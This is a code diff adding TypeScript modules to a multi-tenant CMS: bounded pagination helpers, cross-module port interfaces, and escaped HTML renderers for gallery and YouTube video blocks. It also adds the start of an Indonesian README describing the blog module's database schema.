+++ b/src/modules/_shared/offset-pagination.ts
@@ -1,0 +1,84 @@
+/**
+ * Shared bounds for `?page=`/`OFFSET` (page-number) pagination (Issue #819).
+ *
+ * Keyset pagination (`keyset-pagination.ts`) is the preferred shape for list
+ * endpoints, but a few surfaces genuinely need a page *number* (public blog
+ * archives with `?page=2` links that must stay stable/bookmarkable, admin
+ * lists with a total count). Those compute `OFFSET (page - 1) * pageSize`,
+ * which makes an unbounded `page` two distinct hazards:
+ *
+ *   - `?page=1e8` → `OFFSET 1e9`. Postgres still scans and discards a
+ *     billion rows, holding a pool connection for the duration. On a route
+ *     that is public and unauthenticated, one GET per connection exhausts
+ *     the pool.
+ *   - `?page=abc` → `Number("abc")` → `NaN` → `OFFSET NaN` → 500.
+ *
+ * So every page number crossing into a query must go through
+ * `boundedPageNumber`, which clamps *both* ends and rejects non-finite and
+ * fractional input. Junk is normalised to page 1 rather than surfaced as an
+ * error: these are HTML archive routes where a bad `?page=` should render
+ * the first page, not a 500 (and not a 400 that crawlers would index).
+ */
+
+/**
+ * Upper bound on `?page=`. Deep offsets past this are not meaningful for the
+ * surfaces here (a public blog archive at page 10,000 with the default page
+ * size is already 100,000 posts deep), and allowing them only buys an
+ * attacker a longer scan.
+ */
+export const MAX_PAGE_NUMBER = 10_000;
+
+/**
+ * Clamp a client-supplied page number into `[1, maxPage]`.
+ *
+ * Returns 1 for `undefined`, `NaN`, and `±Infinity` — `Math.max(NaN, 1)` is
+ * `NaN`, so a bare `Math.max` guard passes junk straight through to `OFFSET`.
+ * Fractional input is truncated (`OFFSET 1.5` is a Postgres error).
+ */
+export function boundedPageNumber(
+  page: number | undefined,
+  maxPage: number = MAX_PAGE_NUMBER
+): number {
+  if (page === undefined || !Number.isFinite(page)) {
+    return 1;
+  }
+
+  return Math.min(Math.max(Math.trunc(page), 1), maxPage);
+}
+
+/**
+ * Clamp a client-supplied page size into `[1, maxPageSize]`, falling back to
+ * `defaultPageSize` for absent or non-finite input. Same `NaN` reasoning as
+ * `boundedPageNumber`.
+ */
+export function boundedPageSize(
+  pageSize: number | undefined,
+  defaultPageSize: number,
+  maxPageSize: number
+): number {
+  if (pageSize === undefined || !Number.isFinite(pageSize)) {
+    return defaultPageSize;
+  }
+
+  return Math.min(Math.max(Math.trunc(pageSize), 1), maxPageSize);
+}
+
+/**
+ * Parse a raw `?page=` query-string value into a bounded page number.
+ *
+ * Routes should use this rather than `Number(param)` directly: the parsed
+ * value is typically reused for rendering (pagination nav links, "page N of"
+ * labels), so it must be the *same* clamped number the query used — otherwise
+ * `?page=abc` renders `NaN` into next/prev links even once the query itself
+ * is safe.
+ */
+export function parsePageParam(
+  rawPage: string | null | undefined,
+  maxPage: number = MAX_PAGE_NUMBER
+): number {
+  if (rawPage === null || rawPage === undefined || rawPage.trim() === "") {
+    return 1;
+  }
+
+  return boundedPageNumber(Number(rawPage), maxPage);
+}

--- a/src/modules/_shared/ports/news-media-port.ts
+++ b/src/modules/_shared/ports/news-media-port.ts
@@ -1,0 +1,95 @@
+/**
+ * `NewsMediaPort` (Issue #681, epic #679 platform-hardening) — the
+ * capability `blog_content` consumes from `news_portal`: whether
+ * full-online R2-only mode is active for a tenant, and whether a given
+ * media object id is a verified, same-tenant, safe-to-reference R2
+ * object. This interface lives in neutral ground (`_shared`, imports
+ * NOTHING from either module) so `blog_content`'s application layer can
+ * depend on the TYPE without depending on `news_portal`'s implementation.
+ *
+ * The concrete implementation
+ * (`news-portal/application/news-media-port-adapter.ts`) is wired at the
+ * composition root — every route handler that needs this capability
+ * imports the concrete adapter and passes it into the `blog_content`
+ * function that needs it (`news-media-reference-gate.ts`). Neither
+ * `blog_content` nor `news_portal`'s own `application`/`domain` files
+ * import the other's implementation directly; only this port type and
+ * `PublicContentPort` (the mirror-image capability, `news_portal`
+ * consuming `blog_content`) cross the module boundary, and only as pure
+ * types.
+ *
+ * Before this issue, `blog-content/application/news-portal-r2-mode-gate.ts`
+ * and `blog-content/application/news-media-reference-gate.ts` imported
+ * `news-portal/application/news-portal-tenant-state.ts`,
+ * `news-portal/domain/news-portal-preset-readiness.ts`, and
+ * `news-portal/application/news-media-object-directory.ts` directly — see
+ * `news-media-port-adapter.ts`'s header for the full "three failed
+ * attempts" history behind `isFullOnlineR2ModeActiveForTenant`, preserved
+ * there rather than lost in this extraction.
+ */
+export type ResolvedNewsMediaReferenceDTO = {
+  publicUrl: string;
+  altText: string | null;
+  /**
+   * Metadata fields added by Issue #640 (content quality checklist) —
+   * purely additive, every existing caller (render-time gallery/featured
+   * image resolution) already destructures only `publicUrl`/`altText` and
+   * is unaffected. Sourced verbatim from the news media registry row
+   * (Issue #633); present whenever the id resolves at all (the map never
+   * contains an unsafe/nonexistent id in the first place, same as before).
+   */
+  mimeType: string;
+  width: number | null;
+  height: number | null;
+  sizeBytes: number | null;
+};
+
+export type NewsMediaPort = {
+  /**
+   * `true` only when full-online R2-only mode is genuinely active for
+   * `tenantId` (deployment env configured AND tenant applied the preset).
+   * Fail-closed on every ambiguous case.
+   */
+  isFullOnlineR2ModeActiveForTenant(
+    tx: Bun.SQL,
+    tenantId: string,
+    env?: NodeJS.ProcessEnv
+  ): Promise<boolean>;
+
+  /** `true` only if `mediaObjectId` exists, belongs to `tenantId`, and is `verified`/`attached`. */
+  isMediaReferenceSafe(
+    tx: Bun.SQL,
+    tenantId: string,
+    mediaObjectId: string
+  ): Promise<boolean>;
+
+  /** Resolves every id that IS safe (see above) to its public URL/alt text; unsafe/nonexistent/cross-tenant ids are simply absent from the result — never thrown. */
+  resolveMediaReferences(
+    tx: Bun.SQL,
+    tenantId: string,
+    mediaObjectIds: readonly string[]
+  ): Promise<ReadonlyMap<string, ResolvedNewsMediaReferenceDTO>>;
+
+  /**
+   * The deployment-configured public base URL that verified news-media R2
+   * objects are served from (empty string when unset). A PURE config read —
+   * no DB, no tenant scope — the config-resolution half of the `news_media`
+   * capability, deliberately synchronous so a consumer can call it inline in
+   * a hot path. Lets a consumer recognise a URL that genuinely originated
+   * from this deployment's own trusted R2 bucket (e.g. the LinkedIn provider
+   * adapter's last-mile "is this image safe to hand a third-party API"
+   * defense-in-depth check) WITHOUT statically importing `news_portal`'s
+   * config module.
+   *
+   * Issue #859 (epic #818): that static import
+   * (`social-publishing/infrastructure/linkedin-provider-adapter.ts` ->
+   * `news-portal/domain/news-media-r2-config.ts`'s `resolveNewsMediaR2Config`)
+   * was the SOLE reason `social_publishing` had to declare `news_portal` a
+   * HARD lifecycle dependency, directly contradicting its own
+   * `capabilities.consumes` (`news_media`, `optional: true`). Routing it
+   * through this port (injected at the composition root, exactly like
+   * `resolveMediaReferences`) makes `news_portal` genuinely optional/
+   * disableable per tenant again.
+   */
+  resolveMediaPublicBaseUrl(env?: NodeJS.ProcessEnv): string;
+};

--- a/src/modules/_shared/ports/public-content-port.ts
+++ b/src/modules/_shared/ports/public-content-port.ts
@@ -1,0 +1,75 @@
+/**
+ * `PublicContentPort` (Issue #681, epic #679 platform-hardening) — the
+ * capability `news_portal` consumes from `blog_content`: read-only,
+ * public-safe post/category queries for the editorial homepage section
+ * composer (Issue #637). Lives in neutral ground (`_shared`, imports
+ * NOTHING from either module), same reasoning as `news-media-port.ts`
+ * (see that file's header) but for the opposite direction of capability
+ * flow — `blog_content` is the PROVIDER here, `news_portal` the consumer.
+ *
+ * DTOs here are deliberately their own, minimal shape (not a re-export of
+ * `blog-content/application/public-blog-directory.ts`'s own exported
+ * types) — a port must not create a source dependency on the module that
+ * happens to implement it today.
+ *
+ * Before this issue, `news-portal/application/homepage-section-
+ * composer.ts` and `homepage-section-reference-validation.ts` imported
+ * `blog-content/application/public-blog-directory.ts` and
+ * `blog-content/application/blog-post-directory.ts` directly. The
+ * concrete implementation now lives in
+ * `blog-content/application/public-content-port-adapter.ts`, wired at the
+ * composition root (every `news_portal` route handler that needs this
+ * capability imports the concrete adapter and passes it in).
+ */
+export type PublicContentPostSummaryDTO = {
+  id: string;
+  title: string;
+  slug: string;
+  excerpt: string | null;
+  featuredMediaId: string | null;
+};
+
+export type PublicContentPostPageDTO = {
+  items: readonly PublicContentPostSummaryDTO[];
+  hasNextPage: boolean;
+};
+
+export type PublicContentCategoryDTO = {
+  id: string;
+  name: string;
+  slug: string;
+};
+
+export type PublicContentPort = {
+  /** `true` only if `postId` exists for `tenantId` and is not soft-deleted — existence/ownership check, NOT a public-visibility check (curated homepage sections may reference a not-yet-published post; render-time re-resolution enforces visibility separately). */
+  postExists(tx: Bun.SQL, tenantId: string, postId: string): Promise<boolean>;
+
+  /** Public/published post summaries for a curated set of ids, in the CALLER's requested order (curation order, not chronological) — a stale/unpublished/cross-tenant id is silently dropped. */
+  fetchPostSummariesByIds(
+    tx: Bun.SQL,
+    tenantId: string,
+    postIds: readonly string[]
+  ): Promise<PublicContentPostSummaryDTO[]>;
+
+  /** `null` if the category doesn't exist for `tenantId` or is soft-deleted. */
+  fetchCategoryBySlug(
+    tx: Bun.SQL,
+    tenantId: string,
+    slug: string
+  ): Promise<PublicContentCategoryDTO | null>;
+
+  /** Latest published/public posts, newest first. */
+  listPosts(
+    tx: Bun.SQL,
+    tenantId: string,
+    options: { pageSize?: number }
+  ): Promise<PublicContentPostPageDTO>;
+
+  /** Latest published/public posts in `categoryId`, newest first. */
+  listPostsByCategoryId(
+    tx: Bun.SQL,
+    tenantId: string,
+    categoryId: string,
+    options: { pageSize?: number }
+  ): Promise<PublicContentPostPageDTO>;
+};

--- a/src/modules/_shared/ports/social-publishing-port.ts
+++ b/src/modules/_shared/ports/social-publishing-port.ts
@@ -1,0 +1,70 @@
+/**
+ * `SocialPublishingPort` (Issue #643, epic `social_publishing`) — the
+ * capability `blog_content` consumes from `social_publishing`: "an eligible
+ * article just became published, create outbox jobs for it if applicable."
+ * Lives in neutral ground (`_shared`, imports NOTHING from either module),
+ * same reasoning `news-media-port.ts`/`public-content-port.ts` document in
+ * their own headers.
+ *
+ * `optional: true` on `blog_content`'s `capabilities.consumes` entry for
+ * this port (see `blog-content/module.ts`) — a deployment that never
+ * enables `social_publishing` (the default; see
+ * `social-publishing/domain/social-publishing-config.ts`) still publishes
+ * articles exactly as before, this call simply becomes a documented no-op
+ * (`{ jobsCreated: 0 }`) rather than an error.
+ *
+ * The concrete implementation
+ * (`social-publishing/application/social-publishing-port-adapter.ts`) is a
+ * FACTORY (`createSocialPublishingPortAdapter(mediaPort)`), not a ready-made
+ * singleton — it itself needs `news_portal`'s `NewsMediaPort` (to resolve a
+ * verified R2 image URL for the article, per the issue's own "Integration
+ * with news content" section) but must not import `news_portal`'s concrete
+ * adapter from within `social_publishing/application` (that would be the
+ * exact anti-pattern Issue #681 fixed for `blog_content`/`news_portal`).
+ * Only the TRUE composition root — `pages/api/v1/blog/posts/[id]/publish.ts`
+ * and `scripts/blog-scheduled-publish.ts` — imports both concrete adapters
+ * and wires them together: it imports `newsMediaPortAdapter` (the
+ * `news_portal` media-port implementation) and
+ * `createSocialPublishingPortAdapter` (this port's factory, from
+ * `social-publishing/application/social-publishing-port-adapter.ts`), then
+ * calls `createSocialPublishingPortAdapter(newsMediaPortAdapter)` once to
+ * build the concrete `socialPublishingPort` value used at that call site.
+ * (Deliberately described in prose, not a fenced code sample containing a
+ * literal import statement — `tests/unit/module-boundary.test.ts`'s
+ * text-pattern scan cannot distinguish a real import from one shown only as
+ * an example inside a comment.)
+ */
+export type SocialPublishingTriggerEvent =
+  "post_published" | "scheduled_published" | "manual_editor_action";
+
+export type ArticlePublishedEventInput = {
+  articleId: string;
+  title: string;
+  slug: string;
+  excerpt: string | null;
+  featuredMediaId: string | null;
+  trigger: SocialPublishingTriggerEvent;
+};
+
+export type ArticlePublishedPortResult = {
+  jobsCreated: number;
+};
+
+export type SocialPublishingPort = {
+  /**
+   * Enqueues outbox jobs for every enabled rule/account matching
+   * `event.trigger`, snapshot-captures article content, and is fully
+   * idempotent (a repeated call for the same article/trigger/account never
+   * creates a second job — see `social-publish-idempotency.ts`). Runs
+   * entirely as plain DB writes inside the CALLER's transaction (`tx`) —
+   * no external provider call happens here (ADR-0006); the actual publish
+   * attempt is made later, outside any transaction, by
+   * `social-publish-dispatch.ts`.
+   */
+  onArticlePublished(
+    tx: Bun.SQL,
+    tenantId: string,
+    event: ArticlePublishedEventInput,
+    correlationId?: string
+  ): Promise<ArticlePublishedPortResult>;
+};

--- a/src/modules/_shared/rendering/gallery-block-renderer.ts
+++ b/src/modules/_shared/rendering/gallery-block-renderer.ts
@@ -1,0 +1,109 @@
+/**
+ * Shared, pure "gallery" media renderer (Issue #681, epic #679
+ * platform-hardening). Extracted out of `blog-content/domain/
+ * content-block-rendering.ts` — before this issue, `news-portal/domain/
+ * homepage-section-rendering.ts`'s `gallery_block` section reused this
+ * logic by importing `blog-content`'s domain module DIRECTLY (and
+ * wrapping its own media ids in a synthetic `{blocks: [{type: "gallery",
+ * items: [...]}]}` shape just to call `renderContentJsonToHtml`) — a
+ * genuine domain-to-domain cross-module import in BOTH directions
+ * (`blog-content` already imported FROM `news-portal` elsewhere, see
+ * `news-media-port.ts`'s header), which is exactly the coupling this
+ * issue removes. This file is neutral ground: BOTH modules call it, and
+ * it imports from NEITHER of their `application`/`domain` trees.
+ *
+ * Whitelist-only, same "degrade, don't 500" convention every other
+ * renderer in this repo follows — malformed input (wrong `mediaType`,
+ * unresolved `mediaObjectId`, non-array `items`) is silently skipped,
+ * never thrown. `<img>`/`<video controls>` only, everything escaped via
+ * `escapeHtml` — there is no raw-HTML escape hatch here, by construction.
+ *
+ * `isAbsoluteHttpUrl` is intentionally a local copy of
+ * `blog-content/domain/seo-validation.ts`'s function of the same name
+ * (itself a fully generic http(s)-protocol check with zero
+ * blog-content-specific logic) rather than an import of it — `_shared`
+ * must never import FROM either module's `application`/`domain` tree,
+ * only the other way around, or this file would just relocate the
+ * coupling problem instead of removing it.
+ */
+import { escapeHtml } from "../../../lib/html/escape";
+
+function isAbsoluteHttpUrl(value: string): boolean {
+  try {
+    const parsed = new URL(value);
+    return parsed.protocol === "http:" || parsed.protocol === "https:";
+  } catch {
+    return false;
+  }
+}
+
+export type GalleryBlockItem = {
+  mediaType: "image" | "video";
+  /** Legacy/non-R2-only-mode shape — a raw absolute URL. */
+  url?: string;
+  /** R2-only-mode shape — a verified news media registry object id, resolved via `resolvedMediaUrls`. */
+  mediaObjectId?: string;
+  caption?: string;
+};
+
+/** `mediaObjectId -> public URL`, built by the caller from a real database round trip (this renderer is pure and never performs I/O itself). */
+export type ResolvedGalleryMediaUrls = ReadonlyMap<string, string>;
+
+function renderGalleryBlockItem(
+  item: unknown,
+  resolvedMediaUrls: ResolvedGalleryMediaUrls
+): string | null {
+  if (typeof item !== "object" || item === null || Array.isArray(item)) {
+    return null;
+  }
+
+  const record = item as Record<string, unknown>;
+
+  if (record.mediaType !== "image" && record.mediaType !== "video") {
+    return null;
+  }
+
+  let resolvedUrl: string | null = null;
+
+  if (typeof record.mediaObjectId === "string") {
+    resolvedUrl = resolvedMediaUrls.get(record.mediaObjectId) ?? null;
+  } else if (typeof record.url === "string" && isAbsoluteHttpUrl(record.url)) {
+    resolvedUrl = record.url;
+  }
+
+  if (resolvedUrl === null) {
+    return null;
+  }
+
+  const url = escapeHtml(resolvedUrl);
+  const caption =
+    typeof record.caption === "string" && record.caption.trim().length > 0
+      ? `<figcaption>${escapeHtml(record.caption)}</figcaption>`
+      : "";
+  const media =
+    record.mediaType === "image"
+      ? `<img src="${url}" alt="${caption ? escapeHtml(record.caption as string) : ""}">`
+      : `<video src="${url}" controls></video>`;
+
+  return `<figure>${media}${caption}</figure>`;
+}
+
+/** Renders a `<div class="gallery">` from a list of gallery items, or `null` if every item was malformed/unresolved (caller decides the empty-state fallback). */
+export function renderGalleryBlockHtml(
+  items: unknown,
+  resolvedMediaUrls: ResolvedGalleryMediaUrls
+): string | null {
+  if (!Array.isArray(items) || items.length === 0) {
+    return null;
+  }
+
+  const rendered = items
+    .map((item) => renderGalleryBlockItem(item, resolvedMediaUrls))
+    .filter((html): html is string => html !== null);
+
+  if (rendered.length === 0) {
+    return null;
+  }
+
+  return `<div class="gallery">${rendered.join("\n")}</div>`;
+}

--- a/src/modules/_shared/rendering/video-news-block-renderer.ts
+++ b/src/modules/_shared/rendering/video-news-block-renderer.ts
@@ -1,0 +1,145 @@
+import { escapeHtml } from "../../../lib/html/escape";
+
+/**
+ * Shared, pure `video_news` embed renderer (Issue #639, epic `news_portal`)
+ * — lives in `_shared` alongside `gallery-block-renderer.ts` (Issue #681)
+ * so both `blog_content`'s own renderer and any future `news_portal`
+ * consumer (e.g. a homepage `video_block` section — `homepage-section-
+ * policy.ts` explicitly deferred that sectionType pending this issue, but
+ * wiring it up is its own separate future issue, not this one) can reuse
+ * this without a domain-to-domain import.
+ *
+ * "Public renderer must build safe embed URL from provider + video ID
+ * only" (issue's own Rules) is implemented literally: this file NEVER
+ * reads or emits any HTML the client submitted — it only reads
+ * `provider`/`videoId` (already validated/normalized at write time by
+ * `blog-content/domain/video-news-block-validation.ts`) and constructs ITS
+ * OWN fixed `<iframe>` markup pointing at YouTube's privacy-enhanced
+ * `youtube-nocookie.com` embed domain (also allow-listed in
+ * `astro.config.mjs`'s CSP `frame-src`, or the iframe would be blocked by
+ * the browser regardless of this markup being "safe"). There is no code
+ * path here that can ever render a stored raw `<iframe>`/`<script>` tag —
+ * same "whitelist only, no raw-html escape hatch" convention every other
+ * renderer in this repo follows (see `content-block-rendering.ts`'s own
+ * header comment).
+ *
+ * Deliberately re-derives its own `YOUTUBE_VIDEO_ID_PATTERN` rather than
+ * importing it from `video-news-block-validation.ts` — this keeps
+ * `_shared` (which must never import FROM either `blog_content`'s or
+ * `news_portal`'s `application`/`domain` trees, only the other way around,
+ * see `gallery-block-renderer.ts`'s header) fully independent, and the
+ * pattern is a load-bearing constant of the YouTube id format itself, not
+ * an implementation detail that could drift between the two files.
+ *
+ * KNOWN LIMITATION (port-time, awcms base only — not a mini behavior):
+ * awcms-mini allow-listed `https://www.youtube-nocookie.com` in its CSP
+ * `frame-src` unconditionally (Astro's own `security.csp`, set in
+ * `astro.config.mjs`). This base's CSP (`src/lib/security/security-
+ * headers.ts`, Issue #148/#186) instead guarantees NO third-party origin
+ * is ever allow-listed on a LAN/offline deployment unless an operator
+ * explicitly opts in (Cloudflare Turnstile is the one existing precedent,
+ * gated behind `TURNSTILE_ENABLED`/deployment profile) — a guarantee
+ * `tests/security-headers-csp.test.ts` directly asserts. Adding
+ * `youtube-nocookie.com` unconditionally would break that guarantee for
+ * every deployment, whether or not it ever uses a `video_news` block; this
+ * port deliberately does NOT do that. Net effect: this renderer still
+ * builds the exact same safe `<iframe>` markup below, but until a
+ * deployment's own CSP is extended to allow `frame-src
+ * https://www.youtube-nocookie.com` (e.g. a future opt-in flag mirroring
+ * Turnstile's pattern, or a manual reverse-proxy/CSP override), a
+ * `video_news` block's embed renders in the HTML but is blocked by the
+ * browser — a silent, safe degradation (no video shown, no console
+ * error users would see, no XSS), not a server error. Every other block
+ * type (`gallery`, `paragraph`, `heading`, `list`, `quote`) is entirely
+ * unaffected. See `blog-content/module.ts`'s description field and this
+ * port's PR body for the same note.
+ */
+
+export type VideoNewsBlockItem = {
+  provider: string;
+  videoId: string;
+  title?: string;
+  caption?: string;
+  thumbnailMediaObjectId?: string;
+  durationSeconds?: number;
+  sourceLabel?: string;
+};
+
+/** `mediaObjectId -> public URL` — the SAME map `content-block-rendering.ts` already threads through as `resolvedMediaUrls` for gallery items (Issue #636); a video thumbnail's `mediaObjectId` lives in the same news-media-registry id space, so no second resolution pass/parameter is needed. */
+export type ResolvedVideoNewsThumbnailUrls = ReadonlyMap<string, string>;
+
+const YOUTUBE_EMBED_BASE = "https://www.youtube-nocookie.com/embed/";
+const YOUTUBE_VIDEO_ID_PATTERN = /^[A-Za-z0-9_-]{11}$/;
+
+function buildEmbedUrl(provider: string, videoId: string): string | null {
+  if (provider !== "youtube" || !YOUTUBE_VIDEO_ID_PATTERN.test(videoId)) {
+    return null;
+  }
+
+  return `${YOUTUBE_EMBED_BASE}${videoId}`;
+}
+
+/**
+ * Renders one `video_news` block to a safe `<figure>` containing (when a
+ * verified thumbnail resolves) a custom thumbnail `<img>`, the provider
+ * iframe embed, an optional source-label line, and an optional caption.
+ * Returns `null` (silently skipped by the caller, never thrown) when
+ * `provider`/`videoId` are missing/malformed or the embed URL cannot be
+ * built — malformed content degrades to "renders nothing", same convention
+ * every other block renderer in this repo follows.
+ */
+export function renderVideoNewsBlockHtml(
+  block: unknown,
+  resolvedThumbnailUrls: ResolvedVideoNewsThumbnailUrls
+): string | null {
+  if (typeof block !== "object" || block === null || Array.isArray(block)) {
+    return null;
+  }
+
+  const record = block as Record<string, unknown>;
+
+  if (
+    typeof record.provider !== "string" ||
+    typeof record.videoId !== "string"
+  ) {
+    return null;
+  }
+
+  const embedUrl = buildEmbedUrl(record.provider, record.videoId);
+  if (embedUrl === null) {
+    return null;
+  }
+
+  const title =
+    typeof record.title === "string" && record.title.trim().length > 0
+      ? record.title.trim()
+      : typeof record.sourceLabel === "string" &&
+          record.sourceLabel.trim().length > 0
+        ? record.sourceLabel.trim()
+        : "Video";
+
+  const iframe = `<iframe src="${escapeHtml(embedUrl)}" title="${escapeHtml(title)}" loading="lazy" referrerpolicy="strict-origin-when-cross-origin" allow="accelerometer; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen></iframe>`;
+
+  const thumbnailUrl =
+    typeof record.thumbnailMediaObjectId === "string"
+      ? (resolvedThumbnailUrls.get(record.thumbnailMediaObjectId) ?? null)
+      : null;
+
+  const thumbnail =
+    thumbnailUrl !== null
+      ? `<img class="video-news-thumbnail" src="${escapeHtml(thumbnailUrl)}" alt="${escapeHtml(title)}" loading="lazy">`
+      : "";
+
+  const caption =
+    typeof record.caption === "string" && record.caption.trim().length > 0
+      ? `<figcaption>${escapeHtml(record.caption.trim())}</figcaption>`
+      : "";
+
+  const sourceLabel =
+    typeof record.sourceLabel === "string" &&
+    record.sourceLabel.trim().length > 0
+      ? `<p class="video-news-source">${escapeHtml(record.sourceLabel.trim())}</p>`
+      : "";
+
+  return `<figure class="video-news">${thumbnail}${iframe}${sourceLabel}${caption}</figure>`;
+}

--- a/src/modules/blog-content/README.md
+++ b/src/modules/blog-content/README.md
@@ -1,0 +1,856 @@
+# Blog Content
+
+Implementasi Issue #537, #538, #539, #540, #541, #542, dan #543 (epic #536 — `blog_content`, `docs/adr/0009-public-tenant-scoped-routes.md`). **Modul domain pertama yang didaftarkan langsung di repo base ini** — sebelumnya `AGENTS.md` §Peta modul hanya mendaftarkan modul base generik; lihat catatan di sana untuk konteks. Epic ini **selesai** — semua acceptance criteria issue #537-#543 terpenuhi; `module.ts`'s `status` sudah `active` (bukan lagi `experimental`).
+
+## Scope per issue
+
+Issue #537: module descriptor, domain validation, application placeholder read-only, dan schema database (migration 026/027) — lihat §Tabel dan §Permission seed.
+
+Issue #538: API admin CRUD + lifecycle untuk blog post di `/api/v1/blog/posts` (lihat §Admin API — Blog Posts).
+
+Issue #539: API admin CRUD untuk halaman statis (`/api/v1/blog/pages`, lihat §Admin API — Blog Pages), kategori/tag (`/api/v1/blog/terms`, lihat §Admin API — Blog Taxonomies), post-term relation assignment (lewat `termIds` di payload post, lihat §Post-term relation handling), dan PostgreSQL full-text search (`/api/v1/blog/search` admin + helper public-safe, lihat §Search). Migration `028` mengubah `search_vector` menjadi `GENERATED ALWAYS ... STORED`.
+
+Issue #540: rute publik anonim (tanpa sesi) di bawah `/blog/{tenantCode}/...` sesuai ADR-0009 — index, detail post, arsip kategori/tag, search, RSS feed, dan sitemap. Lihat §Public routes.
+
+Issue #541: revision history append-only untuk post/page, restore revisi (permission eksplisit + Idempotency-Key), scheduled-publishing job (`bun run blog:publish:scheduled`), dan kontrak AsyncAPI domain event penuh untuk lifecycle modul ini. Lihat §Revisions dan §Scheduled publishing.
+
+Issue #542: presentation/monetization extensions — template, menu hierarkis, widget, iklan (ads) dengan placement/scheduling, override tema per-tenant, `translation_group_id` untuk multilingual, dan block `gallery` baru di `content_json` untuk gambar/video publik. Migration `029`/`030`. Lihat §Presentation extensions.
+
+Issue #543 (final hardening): admin UI penuh di bawah `/admin/blog` (dashboard, posts, pages, categories, tags, settings, dan optional advanced screens templates/widgets/menus/ads — semuanya menggunakan `AdminLayout`/design token yang sudah ada, Astro + vanilla JS saja, tanpa framework baru), endpoint `blog_content.settings.*` (`/api/v1/blog/settings`, akhirnya mengaktifkan `awcms_blog_settings` yang sejak migration 026 sudah ada tapi belum punya route), `module.ts`'s `permissions`/`navigation` array (sebelumnya kosong meski 36 permission-nya sudah ada di DB sejak migration 027/030), dan dokumentasi/testing/hardening akhir. Lihat §Admin UI dan §Settings API.
+
+Issue #560 (epic #555, bukan #536): rute publik kedua `/news/...`, tenant-code-free counterpart `/blog/{tenantCode}`, resolusi tenant lewat `resolvePublicTenantFromRequest` (Issue #559) bukan segmen path. Lihat §Public routes `/news`.
+
+Issue #564 (epic #555, bukan #536): `settings.defaults` baru di descriptor (`publicRouteMode`, `publicBasePath`, `legacyTenantRouteEnabled`, `publicLabel`) lewat Module Management's generic tenant-settings framework (Issue #516/epic #510) — **bukan** `rssEnabled`/`sitemapEnabled`, yang tetap di `awcms_blog_settings` yang sudah ada. `/news` menghormati `publicRouteMode`/`publicBasePath`/`publicLabel`; `/blog/{tenantCode}` (ketujuh rutenya) menghormati `legacyTenantRouteEnabled`. Lihat §Public route settings.
+
+## Tabel (migration `026_awcms_blog_content_schema.sql`)
+
+Tujuh tabel persis sesuai doc issue #537 §Database Tables, semuanya tenant-scoped (`ENABLE` + `FORCE ROW LEVEL SECURITY`, satu policy `tenant_isolation` per tabel):
+
+1. **`awcms_blog_posts`** — `status`: `draft → review → scheduled → published → archived` (`domain/post-status.ts` `isValidStatusTransition`), `visibility`: `public | private | unlisted`. Slug unik per `(tenant_id, locale)` selama `deleted_at IS NULL` (partial unique index). `search_vector tsvector` — sejak migration `028` (Issue #539) kolom ini `GENERATED ALWAYS ... STORED` (weighted `title` 'A' / `excerpt` 'B' / `content_text` 'C', text search config `simple`), PostgreSQL sendiri yang menjaganya tetap sinkron; index GIN tetap ada.
+2. **`awcms_blog_pages`** — struktur core sama seperti posts (termasuk `search_vector` generated STORED yang sama sejak migration `028`), plus `page_type` (`standard | landing | legal | system`), `parent_page_id` (self-FK), `menu_order`.
+3. **`awcms_blog_terms`** — kategori (`taxonomy_type = 'category'`, boleh `parent_id`) dan tag (`taxonomy_type = 'tag'`, `CHECK` menolak `parent_id` — lihat juga `domain/taxonomy-policy.ts` untuk cek pre-insert di level aplikasi). Slug unik per `(tenant_id, taxonomy_type)`.
+4. **`awcms_blog_post_terms`** — relasi many-to-many post↔term, tetap membawa `tenant_id` sendiri (bukan hanya lewat FK) supaya RLS bisa langsung mengisolasi baris join ini, konvensi yang sama seperti tabel relasi lain di base ini.
+5. **`awcms_blog_revisions`** — **append-only**, tidak pernah di-`UPDATE` aplikasi (pola sama seperti `awcms_workflow_decisions`/`awcms_audit_events`). "Restore revisi" berarti membuat revisi baru berisi konten lama, bukan menimpa baris manapun — jalur kode restore-nya diimplementasikan Issue #541, lihat §Revisions. Tidak ada kolom `slug`.
+6. **`awcms_blog_redirects`** — soft-deletable (bukan append-only), unik per `(tenant_id, from_path)` selama aktif.
+7. **`awcms_blog_settings`** — satu baris per tenant, `tenant_id` sendiri jadi primary key (pola sama seperti `awcms_tenant_settings`, migration 002), bukan soft-deletable (dikonfigurasi, bukan dihapus).
+
+Tidak ada `GRANT` eksplisit ke `awcms_app` di migration 026 — migration 013 sudah memasang `ALTER DEFAULT PRIVILEGES` yang otomatis meng-grant tabel baru apa pun yang dibuat role pemilik (dipakai ulang oleh migration 025 untuk alasan yang sama).
+
+## Tabel presentasi (migration `029_awcms_blog_content_presentation_schema.sql`, Issue #542)
+
+Delapan penambahan skema, semua tenant-scoped RLS FORCE seperti migration 026, per doc issue #542 §Important Scope Control (tidak membangun ulang base media library/tenant/RBAC/audit/theme engine):
+
+1. **`awcms_blog_templates`** — `layout_json` **whitelisted**, bukan JSON bebas (`{ columns: 1|2|3, sidebarPosition: 'left'|'right'|'none' }`, divalidasi `domain/template-policy.ts`). Unik per `(tenant_id, key)` selama `deleted_at IS NULL`.
+2. **`awcms_blog_menus`** + **`awcms_blog_menu_items`** — hierarkis, **satu level** nesting saja (sama seperti batas parent kategori/tag). `menu_items.link_type` (`post|page|url`) menggerbangi field mana yang berarti (`target_id` untuk post/page, `url` untuk url — divalidasi absolute http(s), `isAbsoluteHttpUrl`).
+3. **`awcms_blog_widgets`** — `position` (`header|sidebar|footer|content_before|content_after`), `body_text` plain text (di-escape saat render, tidak ada field raw-HTML).
+4. **`awcms_blog_ads`** + **`awcms_blog_ad_placements`** — `image_url`/`link_url` wajib absolute http(s). `ad_placements.placement_type` (`global|widget|post|page`) menggerbangi `target_id` (`NULL` untuk `global`, wajib UUID untuk sisanya).
+5. **`awcms_blog_theme_settings`** — satu baris per tenant (`tenant_id` = PK, pola sama `awcms_blog_settings`), `mode` (`light|dark|system`) adalah **override** dari `awcms_tenants.default_theme` (migration 002) — baris tidak ada berarti "warisi default tenant", bukan `'light'` hardcoded.
+6. `awcms_blog_posts`/`awcms_blog_pages` mendapat kolom baru `translation_group_id uuid` (nullable, self-grouping, tanpa trigger) — lihat §Presentation extensions §Multilingual.
+
+Tidak ada tabel baru untuk galeri media — lihat §Presentation extensions §Media/Gallery untuk alasannya.
+
